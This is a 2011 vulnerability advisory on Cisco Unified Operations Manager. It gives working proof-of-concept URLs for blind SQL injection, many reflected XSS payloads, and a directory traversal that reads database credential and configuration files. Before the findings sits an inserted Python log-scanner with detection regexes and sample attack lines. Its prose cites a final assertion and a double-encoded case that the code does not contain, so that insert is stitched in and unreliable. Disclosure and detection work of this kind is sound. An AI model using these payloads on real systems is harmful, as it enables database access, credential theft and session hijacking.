
# Title : Cisco Unified Operations Manager Multiple Vulnerabilities
# Published : 2011-05-18
# Author : Sense of Security


Sense of Security - Security Advisory - SOS-11-006

Release Date.                  18-May-2011
Last Update.                   -
Vendor Notification Date.      28-Feb-2011
Product.                       Cisco Unified Operations Manager
                               Common Services Framework Help Servlet
                               Common Services Device Center
                               CiscoWorks Homepage
                               Note: All of the above products are
                               included by default in CuOM.
Platform.                      Microsoft Windows
Affected versions.             CuOM 8.0 and 8.5 (verified),
                               possibly others.
Severity Rating.               Medium - Low
Impact.                        Database access, cookie and credential
                               theft, impersonation, loss of
                               confidentiality, local file disclosure,
                               information disclosure.
Attack Vector.                 Remote with authentication
Solution Status.               Vendor patch (upgrade to CuOM 8.6 as
                               advised by Cisco)
CVE reference.                 CVE-2011-0959 (CSCtn61716)
                               CVE-2011-0960 (CSCtn61716)
                               CVE-2011-0961 (CSCto12704)
                               CVE-2011-0962 (CSCto12712)
                               CVE-2011-0966 (CSCto35577)

Details.
Cisco Unified Operations Manager (CuOM) is a network management system
(NMS) for voice developed by Cisco Systems. Operations Manager monitors
and evaluates the current status of both the IP communications
infrastructure and the underlying transport infrastructure in your
network.

Multiple vulnerabilities have been identified in Cisco Unified
Operations Manager and associated products: multiple blind SQL
injections, multiple reflected XSS issues, and a directory traversal
vulnerability. All of them require an authenticated session on CuOM
(attack vector: remote with authentication); the reflected XSS issues
are therefore most useful against a user who is already logged in,
which is where the cookie theft and impersonation impact comes from.
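Added example (not part of the Sense of Security advisory): a small access-log scanner that flags the three request classes enumerated above (time-based SQL injection, reflected XSS, and path traversal) against a CuOM/CiscoWorks host. The endpoint paths and parameter names are the advisory's; the log lines are constructed for illustration and assumed to be common-log style with the full request target, which is what a detection engineer would have to work from since the attack vector is an authenticated GET.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines for a CuOM host (not from the advisory or a real system).
# Four are attacks matching the advisory's PoC shapes; the last two are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - admin [18/May/2011:10:01:02 +1000] "GET /iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs=%27waitfor%20delay%270:0:20%27--&Extns=&IPs= HTTP/1.1" 200 512
10.0.0.5 - admin [18/May/2011:10:01:40 +1000] "GET /iptm/advancedfind.do?extn=73fcb%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E23fbe43447 HTTP/1.1" 200 2048
10.0.0.5 - admin [18/May/2011:10:01:55 +1000] "GET /iptm/ddv.do?deviceInstanceName=f3806%22%3balert(1)//9b92b050cf5&deviceCapability=deviceCap HTTP/1.1" 200 1900
10.0.0.5 - admin [18/May/2011:10:02:11 +1000] "GET /cwhp/auditLog.do?file=../../../../../../../boot.ini HTTP/1.1" 200 300
10.0.0.9 - bob [18/May/2011:10:03:00 +1000] "GET /cwhp/auditLog.do?file=audit.log HTTP/1.1" 200 4096
10.0.0.9 - bob [18/May/2011:10:03:30 +1000] "GET /iptm/ddv.do?deviceInstanceName=cucm-pub-01&deviceCapability=deviceCap HTTP/1.1" 200 8192
"""

# Common-log style request line: client, user, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns are applied to the fully decoded parameter value, never to the raw query string.
RULES = {
    "sqli_time_delay": re.compile(r"(?i)'\s*waitfor\s+delay\s*'|;\s*waitfor\s+delay|'\s*(or|and)\b.*--"),
    "xss_reflected": re.compile(r"(?i)<\s*/?\s*script|[\"']\s*;\s*alert\s*\(|\bon\w+\s*=\s*[\"']?\s*alert"),
    "path_traversal": re.compile(r"(\.\./|\.\.\\)"),
}


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing, so %252e%252e/ is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(target):
    """Return a list of (rule, param, decoded_value) hits for one request target."""
    parts = urlsplit(target)
    hits = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already decoded once; catch double encoding
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.append((rule, name, value))
    return hits


def scan_log(text):
    """Scan a block of log lines; each finding carries the authenticated user, since every
    issue in this advisory is post-authentication and the account is the pivot for response."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule, param, value in scan_request(m["target"]):
            findings.append({
                "client": m["client"],
                "user": m["user"],
                "path": urlsplit(m["target"]).path,
                "rule": rule,
                "param": param,
                "value": value,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['rule']:16} user={f['user']} {f['path']} {f['param']}={f['value']!r}")
```

Only the request line is visible here; parameters sent in a POST body would not be, so the same rules would need to run on a proxy or WAF log that captures bodies. Decoding before matching matters: the advisory's own PoC URLs percent-encode spaces and quotes, and a scanner that matches the raw query string misses the double-encoded variant the last assertion in this example exercises.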
1. Blind SQL injection vulnerabilities that affect CuOM
CVE-2011-0960 (CSCtn61716):

The CCMs parameter of PRTestCreation.do can trigger a blind SQL
injection by supplying a single quote followed by a Transact-SQL
WAITFOR DELAY call:

/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=

Additionally, the ccm parameter of TelePresenceReportAction.do can
trigger a blind SQL injection by supplying a single quote:

/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--

A response delayed by roughly the requested 20 seconds, while an
otherwise identical request without the payload returns promptly,
confirms the injection.

2. Reflected XSS vulnerabilities that affect CuOM
CVE-2011-0959 (CSCtn61716):

/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7

The payloads are shown unencoded for readability; the <, > and " characters
need percent-encoding when the request is sent. Two shapes appear: the
injected value lands in HTML (closed with </script> or a fresh <script>
tag), or inside a JavaScript string literal (closed with " and a ;
before alert, with // to comment out the remainder of the line).

Reflected XSS vulnerability that affects Common Services Device Center
CVE-2011-0962 (CSCto12712):

/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1

Reflected XSS vulnerability that affects Common Services Framework
Help Servlet CVE-2011-0961 (CSCto12704):

/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)//4e9adfb2987
3. Directory traversal vulnerability that affects CiscoWorks Homepage
CVE-2011-0966 (CSCto35577):

The file parameter of auditLog.do is not restricted to the audit log
directory, so an authenticated user can read arbitrary files on the
server with a traversal sequence. Port 1741 is the default CiscoWorks
HTTP port.

http://target:1741/cwhp/auditLog.do?file=../../../../../../../boot.ini

cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=../../../../../../../Program Files/CSCOpx/MDC/Tomcat/webapps/triveni/WEB-INF/classes/schedule.properties

DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=../../../../../../../Program Files/CSCOpx/lib/classpath/com/cisco/nm/cmf/dbservice2/DBServer.properties

Note: When reading large files such as this one, raise the row limit
of the audit log view (to 500, for example) so the output is not
truncated.

DB password change log:
http://target:1741/cwhp/auditLog.do?file=../../../../../../../Program Files/CSCOpx/log/dbpwdChange.log

Solution.
Upgrade to CuOM 8.6. Refer to Cisco Bug IDs CSCtn61716, CSCto12704,
CSCto12712 and CSCto35577 for information on patches and availability
of fixes.

Discovered by.
Sense of Security Labs.

About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php